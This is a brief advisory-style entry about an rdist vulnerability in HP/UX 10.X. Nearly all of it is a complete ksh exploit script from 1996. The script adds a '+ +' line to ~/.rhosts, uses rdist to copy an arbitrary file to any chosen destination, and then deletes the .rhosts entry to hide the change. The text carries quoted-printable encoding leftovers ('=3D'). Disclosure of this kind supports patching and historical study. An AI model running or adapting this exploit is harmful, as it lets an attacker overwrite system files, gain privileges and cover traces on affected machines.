COMMAND

    rdist

SYSTEMS AFFECTED

    HP/UX 10.X

PROBLEM

    rdist can be used to create .rhosts  file (+ +) as you can see  by
    following:


        #!/bin/ksh

        # SOD rdist exploit for HP/UX 10.X
        # Boner 10Aug96

        if [ -z "$2" ]
        then
          echo "usage: rdcp from to"
          exit
        fi

        FROM=3D$1
        TO=3D$2
        TMP=3D/tmp/.tmp$$
        HOME=3D`pwd`

        if [ "${FROM}" =3D "${FROM#/}" ]
        then
          FROM=3D$HOME/$FROM
        fi

        echo '+ +' >> ~/.rhosts

        echo "Copying $FROM to $TO"
        rdist -f - << EOF > /dev/null 2>&1
        ${FROM} -> localhost
                install ${TMP};
        EOF
        mv ${TMP} ${TO}
        grep -v "+ +" ~/.rhosts > $TMP
        mv ${TMP} ~/.rhosts
        if [ -f ${TMP} ]; then rm ${TMP}; fi